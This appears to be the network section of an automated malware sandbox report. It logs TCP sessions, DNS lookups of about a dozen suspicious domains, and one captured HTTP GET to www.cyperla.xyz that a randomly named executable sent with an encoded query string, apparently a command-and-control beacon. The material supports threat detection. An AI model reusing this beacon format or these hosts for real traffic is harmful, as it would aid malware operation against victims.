                                                                              Dec 2, 2024 14:45:29.819935083 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:29.927292109 CET8050003101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:29.927352905 CET8050003101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:29.927366018 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:29.927428961 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:29.939985991 CET8050003101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:29.940071106 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:30.839004040 CET5000480192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:30.959094048 CET8050004101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:30.963346958 CET5000480192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:30.982059956 CET5000480192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:31.109740973 CET8050004101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:31.109786987 CET8050004101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:32.491755962 CET5000480192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:32.612179995 CET8050004101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:32.612273932 CET5000480192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:33.514060974 CET5000580192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:33.634464979 CET8050005101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:33.635323048 CET5000580192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:33.646073103 CET5000580192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:33.766396999 CET8050005101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:35.283304930 CET8050005101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:35.283379078 CET8050005101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:35.283580065 CET5000580192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:35.286392927 CET5000580192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:35.406316042 CET8050005101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:40.716236115 CET5000680192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:40.836395979 CET8050006108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:40.836474895 CET5000680192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:40.854090929 CET5000680192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:40.974154949 CET8050006108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:42.241408110 CET8050006108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:42.241652966 CET8050006108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:42.241718054 CET5000680192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:42.241763115 CET8050006108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:42.241847038 CET5000680192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:42.366879940 CET5000680192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:43.385488033 CET5000780192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:43.507070065 CET8050007108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:43.507213116 CET5000780192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:43.522030115 CET5000780192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:43.642134905 CET8050007108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:44.717104912 CET8050007108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:44.717664957 CET8050007108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:44.717726946 CET5000780192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:44.717776060 CET8050007108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:44.717817068 CET5000780192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:45.023253918 CET5000780192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:46.042640924 CET5000880192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:46.162822008 CET8050008108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:46.162897110 CET5000880192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:46.182585001 CET5000880192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:46.303389072 CET8050008108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:46.303407907 CET8050008108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:47.588088036 CET8050008108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:47.588228941 CET8050008108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:47.588341951 CET8050008108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:47.588392019 CET5000880192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:47.588582039 CET5000880192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:47.698103905 CET5000880192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:48.714665890 CET5000980192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:48.836615086 CET8050009108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:48.836703062 CET5000980192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:48.849193096 CET5000980192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:48.969506979 CET8050009108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:49.996381998 CET8050009108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:49.996412992 CET8050009108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:49.996462107 CET8050009108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:49.996526957 CET5000980192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:49.996565104 CET5000980192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:50.006294012 CET5000980192.168.2.10108.181.189.7
                                                                              Dec 2, 2024 14:45:50.126395941 CET8050009108.181.189.7192.168.2.10
                                                                              Dec 2, 2024 14:45:55.416735888 CET5001080192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:45:55.536883116 CET8050010209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:45:55.537038088 CET5001080192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:45:55.552484989 CET5001080192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:45:55.672565937 CET8050010209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:45:56.855241060 CET8050010209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:45:56.855263948 CET8050010209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:45:56.855331898 CET5001080192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:45:57.058125019 CET5001080192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:45:58.073816061 CET5001180192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:45:58.193973064 CET8050011209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:45:58.194046974 CET5001180192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:45:58.214344978 CET5001180192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:45:58.334372044 CET8050011209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:45:59.515208006 CET8050011209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:45:59.515234947 CET8050011209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:45:59.515826941 CET5001180192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:45:59.726234913 CET5001180192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:00.745986938 CET5001280192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:00.866132975 CET8050012209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:00.866245031 CET5001280192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:00.883522987 CET5001280192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:01.003612995 CET8050012209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:01.003648043 CET8050012209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:02.134522915 CET8050012209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:02.134561062 CET8050012209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:02.134608030 CET5001280192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:02.398140907 CET5001280192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:03.416655064 CET5001380192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:03.536746025 CET8050013209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:03.537388086 CET5001380192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:03.548378944 CET5001380192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:03.668445110 CET8050013209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:04.854644060 CET8050013209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:04.854676962 CET8050013209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:04.854840994 CET5001380192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:04.859149933 CET5001380192.168.2.10209.74.77.107
                                                                              Dec 2, 2024 14:46:04.979080915 CET8050013209.74.77.107192.168.2.10
                                                                              Dec 2, 2024 14:46:10.387209892 CET5001480192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:10.507278919 CET805001477.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:10.507355928 CET5001480192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:10.528140068 CET5001480192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:10.648168087 CET805001477.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:11.791536093 CET805001477.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:11.791651964 CET805001477.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:11.798176050 CET5001480192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:12.038754940 CET5001480192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:13.058166027 CET5001580192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:13.178168058 CET805001577.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:13.182435989 CET5001580192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:13.197489977 CET5001580192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:13.317603111 CET805001577.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:14.520742893 CET805001577.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:14.520790100 CET805001577.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:14.520862103 CET5001580192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:14.710619926 CET5001580192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:15.730186939 CET5001680192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:15.850486994 CET805001677.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:15.854309082 CET5001680192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:15.872236013 CET5001680192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:15.993208885 CET805001677.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:15.993227959 CET805001677.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:17.134747982 CET805001677.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:17.134805918 CET805001677.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:17.142219067 CET5001680192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:17.382649899 CET5001680192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:18.402447939 CET5001780192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:18.523133993 CET805001777.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:18.523235083 CET5001780192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:18.535096884 CET5001780192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:18.655183077 CET805001777.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:19.758452892 CET805001777.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:19.758625031 CET805001777.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:19.758837938 CET5001780192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:19.762181044 CET5001780192.168.2.1077.68.64.45
                                                                              Dec 2, 2024 14:46:19.882128000 CET805001777.68.64.45192.168.2.10
                                                                              Dec 2, 2024 14:46:26.014202118 CET5001880192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:26.134160995 CET8050018146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:26.134239912 CET5001880192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:26.151315928 CET5001880192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:26.271471977 CET8050018146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:27.666222095 CET5001880192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:27.683649063 CET8050018146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:27.683723927 CET8050018146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:27.683729887 CET5001880192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:27.686273098 CET5001880192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:27.786147118 CET8050018146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:27.786346912 CET5001880192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:28.683028936 CET5001980192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:28.805279016 CET8050019146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:28.805413961 CET5001980192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:28.828331947 CET5001980192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:28.948637962 CET8050019146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:30.335647106 CET5001980192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:30.360930920 CET8050019146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:30.360996008 CET5001980192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:30.361107111 CET8050019146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:30.361150980 CET5001980192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:30.442189932 CET8050019146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:30.442240953 CET5001980192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:30.455760956 CET8050019146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:30.455805063 CET5001980192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:31.354441881 CET5002080192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:31.474934101 CET8050020146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:31.475151062 CET5002080192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:31.489902020 CET5002080192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:31.610481024 CET8050020146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:31.610511065 CET8050020146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:32.971956015 CET8050020146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:32.972048998 CET8050020146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:32.972100019 CET5002080192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:32.992036104 CET5002080192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:34.081886053 CET5002180192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:34.201900959 CET8050021146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:34.201987982 CET5002180192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:34.213931084 CET5002180192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:34.333955050 CET8050021146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:35.485975027 CET8050021146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:35.486382961 CET8050021146.88.233.115192.168.2.10
                                                                              Dec 2, 2024 14:46:35.488531113 CET5002180192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:35.492213964 CET5002180192.168.2.10146.88.233.115
                                                                              Dec 2, 2024 14:46:35.612217903 CET8050021146.88.233.115192.168.2.10

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 2, 2024 14:43:34.129306078 CET5391653192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:43:35.030673981 CET53539161.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:43:51.702411890 CET5869653192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:43:52.695169926 CET5869653192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:43:53.355854034 CET53586961.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:43:53.355881929 CET53586961.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:44:07.938903093 CET5076253192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:44:08.944884062 CET5076253192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:44:09.077033997 CET53507621.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:44:09.082261086 CET53507621.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:44:23.479896069 CET5272953192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:44:24.015868902 CET53527291.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:44:38.354931116 CET6405253192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:44:38.854800940 CET53640521.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:44:53.214330912 CET5835753192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:44:53.730803013 CET53583571.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:45:08.372595072 CET5365053192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:45:09.370006084 CET5365053192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:45:09.571687937 CET53536501.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:45:09.571702957 CET53536501.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:45:24.292066097 CET5376253192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:45:25.304487944 CET5376253192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:45:25.497694969 CET53537621.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:45:25.497718096 CET53537621.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:45:40.292516947 CET6498653192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:45:40.713469982 CET53649861.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:45:55.012128115 CET5321953192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:45:55.411051989 CET53532191.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:46:09.874152899 CET5153853192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:46:10.383847952 CET53515381.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:46:24.779453039 CET6139253192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:46:25.774192095 CET6139253192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:46:26.008670092 CET53613921.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:46:26.008697987 CET53613921.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:46:40.495682001 CET5895353192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:46:40.802912951 CET53589531.1.1.1192.168.2.10
                                                                              Dec 2, 2024 14:46:45.212408066 CET6540153192.168.2.101.1.1.1
                                                                              Dec 2, 2024 14:46:45.350652933 CET53654011.1.1.1192.168.2.10

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 2, 2024 14:43:34.129306078 CET192.168.2.101.1.1.10xa6e2Standard query (0)www.cyperla.xyzA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:43:51.702411890 CET192.168.2.101.1.1.10x8c47Standard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:43:52.695169926 CET192.168.2.101.1.1.10x8c47Standard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:07.938903093 CET192.168.2.101.1.1.10x68dbStandard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:08.944884062 CET192.168.2.101.1.1.10x68dbStandard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:23.479896069 CET192.168.2.101.1.1.10x430bStandard query (0)www.bser101pp.buzzA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:38.354931116 CET192.168.2.101.1.1.10xa763Standard query (0)www.goldstarfootwear.shopA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:53.214330912 CET192.168.2.101.1.1.10x6086Standard query (0)www.070002018.xyzA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:08.372595072 CET192.168.2.101.1.1.10xb67cStandard query (0)www.bienmaigrir.infoA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:09.370006084 CET192.168.2.101.1.1.10xb67cStandard query (0)www.bienmaigrir.infoA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:24.292066097 CET192.168.2.101.1.1.10xa16bStandard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:25.304487944 CET192.168.2.101.1.1.10xa16bStandard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:40.292516947 CET192.168.2.101.1.1.10x1aeeStandard query (0)www.jalan2.onlineA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:55.012128115 CET192.168.2.101.1.1.10xefe6Standard query (0)www.beyondfitness.liveA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:09.874152899 CET192.168.2.101.1.1.10xba4cStandard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:24.779453039 CET192.168.2.101.1.1.10xb0ccStandard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:25.774192095 CET192.168.2.101.1.1.10xb0ccStandard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:40.495682001 CET192.168.2.101.1.1.10xeedcStandard query (0)www.alihones.lolA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:45.212408066 CET192.168.2.101.1.1.10x47c3Standard query (0)www.alihones.lolA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 2, 2024 14:43:35.030673981 CET1.1.1.1192.168.2.100xa6e2No error (0)www.cyperla.xyzcyperla.xyzCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 2, 2024 14:43:35.030673981 CET1.1.1.1192.168.2.100xa6e2No error (0)cyperla.xyz31.186.11.114A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:43:53.355854034 CET1.1.1.1192.168.2.100x8c47No error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 2, 2024 14:43:53.355854034 CET1.1.1.1192.168.2.100x8c47No error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:43:53.355881929 CET1.1.1.1192.168.2.100x8c47No error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 2, 2024 14:43:53.355881929 CET1.1.1.1192.168.2.100x8c47No error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:09.077033997 CET1.1.1.1192.168.2.100x68dbNo error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:09.082261086 CET1.1.1.1192.168.2.100x68dbNo error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:24.015868902 CET1.1.1.1192.168.2.100x430bNo error (0)www.bser101pp.buzz172.67.158.106A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:24.015868902 CET1.1.1.1192.168.2.100x430bNo error (0)www.bser101pp.buzz104.21.58.90A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:38.854800940 CET1.1.1.1192.168.2.100xa763No error (0)www.goldstarfootwear.shopgoldstarfootwear.shopCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:38.854800940 CET1.1.1.1192.168.2.100xa763No error (0)goldstarfootwear.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:38.854800940 CET1.1.1.1192.168.2.100xa763No error (0)goldstarfootwear.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:44:53.730803013 CET1.1.1.1192.168.2.100x6086No error (0)www.070002018.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:09.571687937 CET1.1.1.1192.168.2.100xb67cNo error (0)www.bienmaigrir.info35.220.176.144A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:09.571702957 CET1.1.1.1192.168.2.100xb67cNo error (0)www.bienmaigrir.info35.220.176.144A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:25.497694969 CET1.1.1.1192.168.2.100xa16bNo error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:25.497718096 CET1.1.1.1192.168.2.100xa16bNo error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:40.713469982 CET1.1.1.1192.168.2.100x1aeeNo error (0)www.jalan2.onlinejalan2.onlineCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:40.713469982 CET1.1.1.1192.168.2.100x1aeeNo error (0)jalan2.online108.181.189.7A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:45:55.411051989 CET1.1.1.1192.168.2.100xefe6No error (0)www.beyondfitness.live209.74.77.107A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:10.383847952 CET1.1.1.1192.168.2.100xba4cNo error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:26.008670092 CET1.1.1.1192.168.2.100xb0ccNo error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:26.008670092 CET1.1.1.1192.168.2.100xb0ccNo error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:26.008697987 CET1.1.1.1192.168.2.100xb0ccNo error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:26.008697987 CET1.1.1.1192.168.2.100xb0ccNo error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:40.802912951 CET1.1.1.1192.168.2.100xeedcName error (3)www.alihones.lolnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:45.350652933 CET1.1.1.1192.168.2.100x47c3Name error (3)www.alihones.lolnonenoneA (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.cyperla.xyz
                                                                              • www.cstrategy.online
                                                                              • www.madhf.tech
                                                                              • www.bser101pp.buzz
                                                                              • www.goldstarfootwear.shop
                                                                              • www.070002018.xyz
                                                                              • www.bienmaigrir.info
                                                                              • www.yc791022.asia
                                                                              • www.jalan2.online
                                                                              • www.beyondfitness.live
                                                                              • www.dietcoffee.online
                                                                              • www.smartcongress.net

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.104982031.186.11.114806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:43:35.167638063 CET354OUTGET /qygv/?_jVx=rlV0_TQ81&6NVpdLF=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgueYbl0NkgEkN4ghVwMkIOvivrFpog== HTTP/1.1
                                                                              Host: www.cyperla.xyz
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
